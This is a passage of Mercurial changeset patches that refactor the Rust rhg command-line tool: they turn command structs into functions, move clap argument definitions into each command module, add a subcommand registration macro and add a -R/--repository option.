b/rust/rhg/src/error.rs @@ -90,7 +90,7 @@ CommandError::Abort { message: format_bytes!( b"config parse error in {}{}: '{}'", - origin.to_bytes(), + origin, line_message, bytes ), # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612812784 -3600 # Mon Feb 08 20:33:04 2021 +0100 # Node ID 184e46550dc89b317820b5cf4b122c37df81bdd3 # Parent eace48b4a78655502a91bcf7d6f3bdeb50fd8d6e rhg: replace command structs with functions The `Command` trait was not used in any generic context, and the struct where nothing more than holders for values parsed from CLI arguments to be available to a `run` method. Differential Revision: https://phab.mercurial-scm.org/D9967 diff --git a/rust/rhg/src/commands.rs b/rust/rhg/src/commands.rs --- a/rust/rhg/src/commands.rs +++ b/rust/rhg/src/commands.rs @@ -3,13 +3,3 @@ pub mod debugrequirements; pub mod files; pub mod root; -use crate::error::CommandError; -use crate::ui::Ui; -use hg::config::Config; - -/// The common trait for rhg commands -/// -/// Normalize the interface of the commands provided by rhg -pub trait Command { - fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError>; -} diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,6 +1,6 @@ -use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use clap::ArgMatches; use hg::config::Config; use hg::operations::cat; use hg::repo::Repo; @@ -12,47 +12,40 @@ Output the current or given revision of files "; -pub struct CatCommand<'a> { - rev: Option<&'a str>, - files: Vec<&'a str>, -} +#[timed] +pub fn run( + ui: &Ui, + config: &Config, + args: &ArgMatches, +) -> Result<(), CommandError> { + let rev = args.value_of("rev"); + let file_args = match args.values_of("files") { + Some(files) => files.collect(), + None => vec![], + }; -impl<'a> CatCommand<'a> { - pub fn new(rev: Option<&'a str>, files: Vec<&'a str>) -> Self { - Self { rev, files } + let repo = Repo::find(config)?; + let cwd = hg::utils::current_dir()?; + + let mut files = vec![]; + for file in file_args.iter() { + // TODO: actually normalize `..` path segments etc? + let normalized = cwd.join(&file); + let stripped = normalized + .strip_prefix(&repo.working_directory_path()) + // TODO: error message for path arguments outside of the repo + .map_err(|_| CommandError::abort(""))?; + let hg_file = HgPathBuf::try_from(stripped.to_path_buf()) + .map_err(|e| CommandError::abort(e.to_string()))?; + files.push(hg_file); } - fn display(&self, ui: &Ui, data: &[u8]) -> Result<(), CommandError> { - ui.write_stdout(data)?; - Ok(()) + match rev { + Some(rev) => { + let data = cat(&repo, rev, &files).map_err(|e| (e, rev))?; + ui.write_stdout(&data)?; + Ok(()) + } + None => Err(CommandError::Unimplemented.into()), } } - -impl<'a> Command for CatCommand<'a> { - #[timed] - fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { - let repo = Repo::find(config)?; - let cwd = hg::utils::current_dir()?; - - let mut files = vec![]; - for file in self.files.iter() { - // TODO: actually normalize `..` path segments etc? - let normalized = cwd.join(&file); - let stripped = normalized - .strip_prefix(&repo.working_directory_path()) - // TODO: error message for path arguments outside of the repo - .map_err(|_| CommandError::abort(""))?; - let hg_file = HgPathBuf::try_from(stripped.to_path_buf()) - .map_err(|e| CommandError::abort(e.to_string()))?; - files.push(hg_file); - } - - match self.rev { - Some(rev) => { - let data = cat(&repo, rev, &files).map_err(|e| (e, rev))?; - self.display(ui, &data) - } - None => Err(CommandError::Unimplemented.into()), - } - } -} diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ b/rust/rhg/src/commands/debugdata.rs @@ -1,6 +1,6 @@ -use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use clap::ArgMatches; use hg::config::Config; use hg::operations::{debug_data, DebugDataKind}; use hg::repo::Repo; @@ -10,28 +10,33 @@ Dump the contents of a data file revision "; -pub struct DebugDataCommand<'a> { - rev: &'a str, - kind: DebugDataKind, -} - -impl<'a> DebugDataCommand<'a> { - pub fn new(rev: &'a str, kind: DebugDataKind) -> Self { - DebugDataCommand { rev, kind } - } -} +#[timed] +pub fn run( + ui: &Ui, + config: &Config, + args: &ArgMatches, +) -> Result<(), CommandError> { + let rev = args + .value_of("rev") + .expect("rev should be a required argument"); + let kind = + match (args.is_present("changelog"), args.is_present("manifest")) { + (true, false) => DebugDataKind::Changelog, + (false, true) => DebugDataKind::Manifest, + (true, true) => { + unreachable!("Should not happen since options are exclusive") + } + (false, false) => { + unreachable!("Should not happen since options are required") + } + }; -impl<'a> Command for DebugDataCommand<'a> { - #[timed] - fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { - let repo = Repo::find(config)?; - let data = debug_data(&repo, self.rev, self.kind) - .map_err(|e| (e, self.rev))?; + let repo = Repo::find(config)?; + let data = debug_data(&repo, rev, kind).map_err(|e| (e, rev))?; - let mut stdout = ui.stdout_buffer(); - stdout.write_all(&data)?; - stdout.flush()?; + let mut stdout = ui.stdout_buffer(); + stdout.write_all(&data)?; + stdout.flush()?; - Ok(()) - } + Ok(()) } diff --git a/rust/rhg/src/commands/debugrequirements.rs b/rust/rhg/src/commands/debugrequirements.rs --- a/rust/rhg/src/commands/debugrequirements.rs +++ b/rust/rhg/src/commands/debugrequirements.rs @@ -1,6 +1,6 @@ -use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use clap::ArgMatches; use hg::config::Config; use hg::repo::Repo; @@ -8,25 +8,19 @@ Print the current repo requirements. "; -pub struct DebugRequirementsCommand {} - -impl DebugRequirementsCommand { - pub fn new() -> Self { - DebugRequirementsCommand {} +pub fn run( + ui: &Ui, + config: &Config, + _args: &ArgMatches, +) -> Result<(), CommandError> { + let repo = Repo::find(config)?; + let mut output = String::new(); + let mut requirements: Vec<_> = repo.requirements().iter().collect(); + requirements.sort(); + for req in requirements { + output.push_str(req); + output.push('\n'); } + ui.write_stdout(output.as_bytes())?; + Ok(()) } - -impl Command for DebugRequirementsCommand { - fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { - let repo = Repo::find(config)?; - let mut output = String::new(); - let mut requirements: Vec<_> = repo.requirements().iter().collect(); - requirements.sort(); - for req in requirements { - output.push_str(req); - output.push('\n'); - } - ui.write_stdout(output.as_bytes())?; - Ok(()) - } -} diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -1,6 +1,6 @@ -use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use clap::ArgMatches; use hg::config::Config; use hg::operations::list_rev_tracked_files; use hg::operations::Dirstate; @@ -14,49 +14,42 @@ Returns 0 on success. "; -pub struct FilesCommand<'a> { - rev: Option<&'a str>, -} - -impl<'a> FilesCommand<'a> { - pub fn new(rev: Option<&'a str>) -> Self { - FilesCommand { rev } - } +pub fn run( + ui: &Ui, + config: &Config, + args: &ArgMatches, +) -> Result<(), CommandError> { + let rev = args.value_of("rev"); - fn display_files( - &self, - ui: &Ui, - repo: &Repo, - files: impl IntoIterator<Item = &'a HgPath>, - ) -> Result<(), CommandError> { - let cwd = hg::utils::current_dir()?; - let rooted_cwd = cwd - .strip_prefix(repo.working_directory_path()) - .expect("cwd was already checked within the repository"); - let rooted_cwd = HgPathBuf::from(get_bytes_from_path(rooted_cwd)); - - let mut stdout = ui.stdout_buffer(); - - for file in files { - stdout.write_all(relativize_path(file, &rooted_cwd).as_ref())?; - stdout.write_all(b"\n")?; - } - stdout.flush()?; - Ok(()) + let repo = Repo::find(config)?; + if let Some(rev) = rev { + let files = + list_rev_tracked_files(&repo, rev).map_err(|e| (e, rev))?; + display_files(ui, &repo, files.iter()) + } else { + let distate = Dirstate::new(&repo)?; + let files = distate.tracked_files()?; + display_files(ui, &repo, files) } } -impl<'a> Command for FilesCommand<'a> { - fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { - let repo = Repo::find(config)?; - if let Some(rev) = self.rev { - let files = - list_rev_tracked_files(&repo, rev).map_err(|e| (e, rev))?; - self.display_files(ui, &repo, files.iter()) - } else { - let distate = Dirstate::new(&repo)?; - let files = distate.tracked_files()?; - self.display_files(ui, &repo, files) - } +fn display_files<'a>( + ui: &Ui, + repo: &Repo, + files: impl IntoIterator<Item = &'a HgPath>, +) -> Result<(), CommandError> { + let cwd = hg::utils::current_dir()?; + let rooted_cwd = cwd + .strip_prefix(repo.working_directory_path()) + .expect("cwd was already checked within the repository"); + let rooted_cwd = HgPathBuf::from(get_bytes_from_path(rooted_cwd)); + + let mut stdout = ui.stdout_buffer(); + + for file in files { + stdout.write_all(relativize_path(file, &rooted_cwd).as_ref())?; + stdout.write_all(b"\n")?; } + stdout.flush()?; + Ok(()) } diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/root.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/root.rs @@ -1,6 +1,6 @@ -use crate::commands::Command; use crate::error::CommandError; use crate::ui::Ui; +use clap::ArgMatches; use format_bytes::format_bytes; use hg::config::Config; use hg::repo::Repo; @@ -12,19 +12,13 @@ Returns 0 on success. "; -pub struct RootCommand {} - -impl RootCommand { - pub fn new() -> Self { - RootCommand {} - } +pub fn run( + ui: &Ui, + config: &Config, + _args: &ArgMatches, +) -> Result<(), CommandError> { + let repo = Repo::find(config)?; + let bytes = get_bytes_from_path(repo.working_directory_path()); + ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; + Ok(()) } - -impl Command for RootCommand { - fn run(&self, ui: &Ui, config: &Config) -> Result<(), CommandError> { - let repo = Repo::find(config)?; - let bytes = get_bytes_from_path(repo.working_directory_path()); - ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; - Ok(()) - } -} diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -6,14 +6,11 @@ use clap::ArgMatches; use clap::SubCommand; use format_bytes::format_bytes; -use hg::operations::DebugDataKind; -use std::convert::TryFrom; mod commands; mod error; mod exitcode; mod ui; -use commands::Command; use error::CommandError; fn main() { @@ -126,69 +123,15 @@ let config = hg::config::Config::load()?; match matches.subcommand() { - ("root", _) => commands::root::RootCommand::new().run(&ui, &config), - ("files", Some(matches)) => { - commands::files::FilesCommand::try_from(matches)?.run(&ui, &config) - } - ("cat", Some(matches)) => { - commands::cat::CatCommand::try_from(matches)?.run(&ui, &config) + ("root", Some(matches)) => commands::root::run(ui, &config, matches), + ("files", Some(matches)) => commands::files::run(ui, &config, matches), + ("cat", Some(matches)) => commands::cat::run(ui, &config, matches), + ("debugdata", Some(matches)) => { + commands::debugdata::run(ui, &config, matches) } - ("debugdata", Some(matches)) => { - commands::debugdata::DebugDataCommand::try_from(matches)? - .run(&ui, &config) - } - ("debugrequirements", _) => { - commands::debugrequirements::DebugRequirementsCommand::new() - .run(&ui, &config) + ("debugrequirements", Some(matches)) => { + commands::debugrequirements::run(ui, &config, matches) } _ => unreachable!(), // Because of AppSettings::SubcommandRequired, } } - -impl<'a> TryFrom<&'a ArgMatches<'_>> for commands::files::FilesCommand<'a> { - type Error = CommandError; - - fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> { - let rev = args.value_of("rev"); - Ok(commands::files::FilesCommand::new(rev)) - } -} - -impl<'a> TryFrom<&'a ArgMatches<'_>> for commands::cat::CatCommand<'a> { - type Error = CommandError; - - fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> { - let rev = args.value_of("rev"); - let files = match args.values_of("files") { - Some(files) => files.collect(), - None => vec![], - }; - Ok(commands::cat::CatCommand::new(rev, files)) - } -} - -impl<'a> TryFrom<&'a ArgMatches<'_>> - for commands::debugdata::DebugDataCommand<'a> -{ - type Error = CommandError; - - fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> { - let rev = args - .value_of("rev") - .expect("rev should be a required argument"); - let kind = match ( - args.is_present("changelog"), - args.is_present("manifest"), - ) { - (true, false) => DebugDataKind::Changelog, - (false, true) => DebugDataKind::Manifest, - (true, true) => { - unreachable!("Should not happen since options are exclusive") - } - (false, false) => { - unreachable!("Should not happen since options are required") - } - }; - Ok(commands::debugdata::DebugDataCommand::new(rev, kind)) - } -} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612814736 -3600 # Mon Feb 08 21:05:36 2021 +0100 # Node ID 1ecaf09d996412e2589ce8e3c69a8a3d7af01a4f # Parent 184e46550dc89b317820b5cf4b122c37df81bdd3 rhg: Move subcommand CLI arguments definitions to respective modules Differential Revision: https://phab.mercurial-scm.org/D9968 diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,5 +1,6 @@ use crate::error::CommandError; use crate::ui::Ui; +use clap::Arg; use clap::ArgMatches; use hg::config::Config; use hg::operations::cat; @@ -12,6 +13,27 @@ Output the current or given revision of files "; +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("cat") + .arg( + Arg::with_name("rev") + .help("search the repository as it is in REV") + .short("-r") + .long("--revision") + .value_name("REV") + .takes_value(true), + ) + .arg( + clap::Arg::with_name("files") + .required(true) + .multiple(true) + .empty_values(false) + .value_name("FILE") + .help("Activity to start: activity@category"), + ) + .about(HELP_TEXT) +} + #[timed] pub fn run( ui: &Ui, diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ b/rust/rhg/src/commands/debugdata.rs @@ -1,5 +1,7 @@ use crate::error::CommandError; use crate::ui::Ui; +use clap::Arg; +use clap::ArgGroup; use clap::ArgMatches; use hg::config::Config; use hg::operations::{debug_data, DebugDataKind}; @@ -10,6 +12,34 @@ Dump the contents of a data file revision "; +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("debugdata") + .arg( + Arg::with_name("changelog") + .help("open changelog") + .short("-c") + .long("--changelog"), + ) + .arg( + Arg::with_name("manifest") + .help("open manifest") + .short("-m") + .long("--manifest"), + ) + .group( + ArgGroup::with_name("") + .args(&["changelog", "manifest"]) + .required(true), + ) + .arg( + Arg::with_name("rev") + .help("revision") + .required(true) + .value_name("REV"), + ) + .about(HELP_TEXT) +} + #[timed] pub fn run( ui: &Ui, diff --git a/rust/rhg/src/commands/debugrequirements.rs b/rust/rhg/src/commands/debugrequirements.rs --- a/rust/rhg/src/commands/debugrequirements.rs +++ b/rust/rhg/src/commands/debugrequirements.rs @@ -8,6 +8,10 @@ Print the current repo requirements. "; +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("debugrequirements").about(HELP_TEXT) +} + pub fn run( ui: &Ui, config: &Config, diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -1,5 +1,6 @@ use crate::error::CommandError; use crate::ui::Ui; +use clap::Arg; use clap::ArgMatches; use hg::config::Config; use hg::operations::list_rev_tracked_files; @@ -14,6 +15,19 @@ Returns 0 on success. "; +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("files") + .arg( + Arg::with_name("rev") + .help("search the repository as it is in REV") + .short("-r") + .long("--revision") + .value_name("REV") + .takes_value(true), + ) + .about(HELP_TEXT) +} + pub fn run( ui: &Ui, config: &Config, diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/root.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/root.rs @@ -12,6 +12,10 @@ Returns 0 on success. "; +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("root").about(HELP_TEXT) +} + pub fn run( ui: &Ui, config: &Config, diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -1,10 +1,7 @@ extern crate log; use clap::App; use clap::AppSettings; -use clap::Arg; -use clap::ArgGroup; use clap::ArgMatches; -use clap::SubCommand; use format_bytes::format_bytes; mod commands; @@ -20,72 +17,11 @@ .setting(AppSettings::SubcommandRequired) .setting(AppSettings::VersionlessSubcommands) .version("0.0.1") - .subcommand( - SubCommand::with_name("root").about(commands::root::HELP_TEXT), - ) - .subcommand( - SubCommand::with_name("files") - .arg( - Arg::with_name("rev") - .help("search the repository as it is in REV") - .short("-r") - .long("--revision") - .value_name("REV") - .takes_value(true), - ) - .about(commands::files::HELP_TEXT), - ) - .subcommand( - SubCommand::with_name("cat") - .arg( - Arg::with_name("rev") - .help("search the repository as it is in REV") - .short("-r") - .long("--revision") - .value_name("REV") - .takes_value(true), - ) - .arg( - clap::Arg::with_name("files") - .required(true) - .multiple(true) - .empty_values(false) - .value_name("FILE") - .help("Activity to start: activity@category"), - ) - .about(commands::cat::HELP_TEXT), - ) - .subcommand( - SubCommand::with_name("debugdata") - .about(commands::debugdata::HELP_TEXT) - .arg( - Arg::with_name("changelog") - .help("open changelog") - .short("-c") - .long("--changelog"), - ) - .arg( - Arg::with_name("manifest") - .help("open manifest") - .short("-m") - .long("--manifest"), - ) - .group( - ArgGroup::with_name("") - .args(&["changelog", "manifest"]) - .required(true), - ) - .arg( - Arg::with_name("rev") - .help("revision") - .required(true) - .value_name("REV"), - ), - ) - .subcommand( - SubCommand::with_name("debugrequirements") - .about(commands::debugrequirements::HELP_TEXT), - ); + .subcommand(commands::root::args()) + .subcommand(commands::files::args()) + .subcommand(commands::cat::args()) + .subcommand(commands::debugdata::args()) + .subcommand(commands::debugrequirements::args()); let matches = app.clone().get_matches_safe().unwrap_or_else(|err| { let _ = ui::Ui::new().writeln_stderr_str(&err.message); # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612816132 -3600 # Mon Feb 08 21:28:52 2021 +0100 # Node ID 95d37db31479de3ba2f8f2d3b64ec46781aaeb1a # Parent 1ecaf09d996412e2589ce8e3c69a8a3d7af01a4f rhg: Replace subcommand boilerplate with a macro This removes some repetition, and will avoid additional repetition in the next commit. Differential Revision: https://phab.mercurial-scm.org/D9969 diff --git a/rust/rhg/src/commands.rs b/rust/rhg/src/commands.rs deleted file mode 100644 --- a/rust/rhg/src/commands.rs +++ /dev/null @@ -1,5 +0,0 @@ -pub mod cat; -pub mod debugdata; -pub mod debugrequirements; -pub mod files; -pub mod root; diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -4,7 +4,6 @@ use clap::ArgMatches; use format_bytes::format_bytes; -mod commands; mod error; mod exitcode; mod ui; @@ -16,23 +15,27 @@ .setting(AppSettings::AllowInvalidUtf8) .setting(AppSettings::SubcommandRequired) .setting(AppSettings::VersionlessSubcommands) - .version("0.0.1") - .subcommand(commands::root::args()) - .subcommand(commands::files::args()) - .subcommand(commands::cat::args()) - .subcommand(commands::debugdata::args()) - .subcommand(commands::debugrequirements::args()); - - let matches = app.clone().get_matches_safe().unwrap_or_else(|err| { - let _ = ui::Ui::new().writeln_stderr_str(&err.message); - std::process::exit(exitcode::UNIMPLEMENTED) - }); + .version("0.0.1"); + let app = add_subcommand_args(app); let ui = ui::Ui::new(); - let command_result = match_subcommand(matches, &ui); + let matches = app.clone().get_matches_safe().unwrap_or_else(|err| { + let _ = ui.writeln_stderr_str(&err.message); + std::process::exit(exitcode::UNIMPLEMENTED) + }); + let (subcommand_name, subcommand_matches) = matches.subcommand(); + let run = subcommand_run_fn(subcommand_name) + .expect("unknown subcommand name from clap despite AppSettings::SubcommandRequired"); + let args = subcommand_matches + .expect("no subcommand arguments from clap despite AppSettings::SubcommandRequired"); - let exit_code = match command_result { + let result = (|| -> Result<(), CommandError> { + let config = hg::config::Config::load()?; + run(&ui, &config, args) + })(); + + let exit_code = match result { Ok(_) => exitcode::OK, // Exit with a specific code and no error message to let a potential @@ -52,22 +55,40 @@ std::process::exit(exit_code) } -fn match_subcommand( - matches: ArgMatches, - ui: &ui::Ui, -) -> Result<(), CommandError> { - let config = hg::config::Config::load()?; +macro_rules! subcommands { + ($( $command: ident )+) => { + mod commands { + $( + pub mod $command; + )+ + } + + fn add_subcommand_args<'a, 'b>(app: App<'a, 'b>) -> App<'a, 'b> { + app + $( + .subcommand(commands::$command::args()) + )+ + } - match matches.subcommand() { - ("root", Some(matches)) => commands::root::run(ui, &config, matches), - ("files", Some(matches)) => commands::files::run(ui, &config, matches), - ("cat", Some(matches)) => commands::cat::run(ui, &config, matches), - ("debugdata", Some(matches)) => { - commands::debugdata::run(ui, &config, matches) + fn subcommand_run_fn(name: &str) -> Option<fn( + &ui::Ui, + &hg::config::Config, + &ArgMatches, + ) -> Result<(), CommandError>> { + match name { + $( + stringify!($command) => Some(commands::$command::run), + )+ + _ => None, + } } - ("debugrequirements", Some(matches)) => { - commands::debugrequirements::run(ui, &config, matches) - } - _ => unreachable!(), // Because of AppSettings::SubcommandRequired, - } + }; } + +subcommands! { + cat + debugdata + debugrequirements + files + root +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612816650 -3600 # Mon Feb 08 21:37:30 2021 +0100 # Node ID d8730ff51d5a97dba40046b9a6cac0a66a7e16b6 # Parent 95d37db31479de3ba2f8f2d3b64ec46781aaeb1a rhg: Add support for -R and --repository command-line arguments Differential Revision: https://phab.mercurial-scm.org/D9970 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,6 +1,7 @@ use crate::config::{Config, ConfigError, ConfigParseError}; use crate::errors::{HgError, IoResultExt}; use crate::requirements; +use crate::utils::current_dir; use crate::utils::files::get_path_from_bytes; use memmap::{Mmap, MmapOptions}; use std::collections::HashSet; @@ -18,7 +19,7 @@ #[derive(Debug, derive_more::From)] pub enum RepoError { NotFound { - current_directory: PathBuf, + at: PathBuf, }, #[from] ConfigParseError(ConfigParseError), @@ -44,15 +45,36 @@ impl Repo { /// Search the current directory and its ancestores for a repository: /// a working directory that contains a `.hg` sub-directory. - pub fn find(config: &Config) -> Result<Self, RepoError> { - let current_directory = crate::utils::current_dir()?; - // ancestors() is inclusive: it first yields `current_directory` as-is. - for ancestor in current_directory.ancestors() { - if ancestor.join(".hg").is_dir() { - return Ok(Self::new_at_path(ancestor.to_owned(), config)?); + /// + /// `explicit_path` is for `--repository` command-line arguments. + pub fn find( + config: &Config, + explicit_path: Option<&Path>, + ) -> Result<Self, RepoError> { + if let Some(root) = explicit_path { + // Having an absolute path isn’t necessary here but can help code + // elsewhere + let root = current_dir()?.join(root); + if root.join(".hg").is_dir() { + Self::new_at_path(root, config) + } else { + Err(RepoError::NotFound { + at: root.to_owned(), + }) } + } else { + let current_directory = crate::utils::current_dir()?; + // ancestors() is inclusive: it first yields `current_directory` + // as-is. + for ancestor in current_directory.ancestors() { + if ancestor.join(".hg").is_dir() { + return Self::new_at_path(ancestor.to_owned(), config); + } + } + Err(RepoError::NotFound { + at: current_directory, + }) } - Err(RepoError::NotFound { current_directory }) } /// To be called after checking that `.hg` is a sub-directory diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -8,6 +8,7 @@ use hg::utils::hg_path::HgPathBuf; use micro_timer::timed; use std::convert::TryFrom; +use std::path::Path; pub const HELP_TEXT: &str = " Output the current or given revision of files @@ -38,6 +39,7 @@ pub fn run( ui: &Ui, config: &Config, + repo_path: Option<&Path>, args: &ArgMatches, ) -> Result<(), CommandError> { let rev = args.value_of("rev"); @@ -46,7 +48,7 @@ None => vec![], }; - let repo = Repo::find(config)?; + let repo = Repo::find(config, repo_path)?; let cwd = hg::utils::current_dir()?; let mut files = vec![]; diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ b/rust/rhg/src/commands/debugdata.rs @@ -7,6 +7,7 @@ use hg::operations::{debug_data, DebugDataKind}; use hg::repo::Repo; use micro_timer::timed; +use std::path::Path; pub const HELP_TEXT: &str = " Dump the contents of a data file revision @@ -44,6 +45,7 @@ pub fn run( ui: &Ui, config: &Config, + repo_path: Option<&Path>, args: &ArgMatches, ) -> Result<(), CommandError> { let rev = args @@ -61,7 +63,7 @@ } }; - let repo = Repo::find(config)?; + let repo = Repo::find(config, repo_path)?; let data = debug_data(&repo, rev, kind).map_err(|e| (e, rev))?; let mut stdout = ui.stdout_buffer(); diff --git a/rust/rhg/src/commands/debugrequirements.rs b/rust/rhg/src/commands/debugrequirements.rs --- a/rust/rhg/src/commands/debugrequirements.rs +++ b/rust/rhg/src/commands/debugrequirements.rs @@ -3,6 +3,7 @@ use clap::ArgMatches; use hg::config::Config; use hg::repo::Repo; +use std::path::Path; pub const HELP_TEXT: &str = " Print the current repo requirements. @@ -15,9 +16,10 @@ pub fn run( ui: &Ui, config: &Config, + repo_path: Option<&Path>, _args: &ArgMatches, ) -> Result<(), CommandError> { - let repo = Repo::find(config)?; + let repo = Repo::find(config, repo_path)?; let mut output = String::new(); let mut requirements: Vec<_> = repo.requirements().iter().collect(); requirements.sort(); diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -8,6 +8,7 @@ use hg::repo::Repo; use hg::utils::files::{get_bytes_from_path, relativize_path}; use hg::utils::hg_path::{HgPath, HgPathBuf}; +use std::path::Path; pub const HELP_TEXT: &str = " List tracked files. @@ -31,11 +32,12 @@ pub fn run( ui: &Ui, config: &Config, + repo_path: Option<&Path>, args: &ArgMatches, ) -> Result<(), CommandError> { let rev = args.value_of("rev"); - let repo = Repo::find(config)?; + let repo = Repo::find(config, repo_path)?; if let Some(rev) = rev { let files = list_rev_tracked_files(&repo, rev).map_err(|e| (e, rev))?; @@ -52,16 +54,15 @@ repo: &Repo, files: impl IntoIterator<Item = &'a HgPath>, ) -> Result<(), CommandError> { - let cwd = hg::utils::current_dir()?; - let rooted_cwd = cwd - .strip_prefix(repo.working_directory_path()) - .expect("cwd was already checked within the repository"); - let rooted_cwd = HgPathBuf::from(get_bytes_from_path(rooted_cwd)); + let cwd = HgPathBuf::from(get_bytes_from_path(hg::utils::current_dir()?)); + let working_directory = + HgPathBuf::from(get_bytes_from_path(repo.working_directory_path())); let mut stdout = ui.stdout_buffer(); for file in files { - stdout.write_all(relativize_path(file, &rooted_cwd).as_ref())?; + let file = working_directory.join(file); + stdout.write_all(relativize_path(&file, &cwd).as_ref())?; stdout.write_all(b"\n")?; } stdout.flush()?; diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/root.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/root.rs @@ -5,6 +5,7 @@ use hg::config::Config; use hg::repo::Repo; use hg::utils::files::get_bytes_from_path; +use std::path::Path; pub const HELP_TEXT: &str = " Print the root directory of the current repository. @@ -19,9 +20,10 @@ pub fn run( ui: &Ui, config: &Config, + repo_path: Option<&Path>, _args: &ArgMatches, ) -> Result<(), CommandError> { - let repo = Repo::find(config)?; + let repo = Repo::find(config, repo_path)?; let bytes = get_bytes_from_path(repo.working_directory_path()); ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; Ok(()) diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -54,10 +54,10 @@ impl From<RepoError> for CommandError { fn from(error: RepoError) -> Self { match error { - RepoError::NotFound { current_directory } => CommandError::Abort { + RepoError::NotFound { at } => CommandError::Abort { message: format_bytes!( b"no repository found in '{}' (.hg not found)!", - get_bytes_from_path(current_directory) + get_bytes_from_path(at) ), }, RepoError::ConfigParseError(error) => error.into(), diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -1,14 +1,27 @@ extern crate log; use clap::App; use clap::AppSettings; +use clap::Arg; use clap::ArgMatches; use format_bytes::format_bytes; +use std::path::Path; mod error; mod exitcode; mod ui; use error::CommandError; +fn add_global_args<'a, 'b>(app: App<'a, 'b>) -> App<'a, 'b> { + app.arg( + Arg::with_name("repository") + .help("repository root directory") + .short("-R") + .long("--repository") + .value_name("REPO") + .takes_value(true), + ) +} + fn main() { env_logger::init(); let app = App::new("rhg") @@ -16,6 +29,7 @@ .setting(AppSettings::SubcommandRequired) .setting(AppSettings::VersionlessSubcommands) .version("0.0.1"); + let app = add_global_args(app); let app = add_subcommand_args(app); let ui = ui::Ui::new(); @@ -24,15 +38,22 @@ let _ = ui.writeln_stderr_str(&err.message); std::process::exit(exitcode::UNIMPLEMENTED) }); + let (subcommand_name, subcommand_matches) = matches.subcommand(); let run = subcommand_run_fn(subcommand_name) .expect("unknown subcommand name from clap despite AppSettings::SubcommandRequired"); let args = subcommand_matches .expect("no subcommand arguments from clap despite AppSettings::SubcommandRequired"); + // Global arguments can be in either based on e.g. `hg -R ./foo log` v.s. + // `hg log -R ./foo` + let global_arg = + |name| args.value_of_os(name).or_else(|| matches.value_of_os(name)); + + let repo_path = global_arg("repository").map(Path::new); let result = (|| -> Result<(), CommandError> { let config = hg::config::Config::load()?; - run(&ui, &config, args) + run(&ui, &config, repo_path, args) })(); let exit_code = match result { @@ -66,13 +87,14 @@ fn add_subcommand_args<'a, 'b>(app: App<'a, 'b>) -> App<'a, 'b> { app $( - .subcommand(commands::$command::args()) + 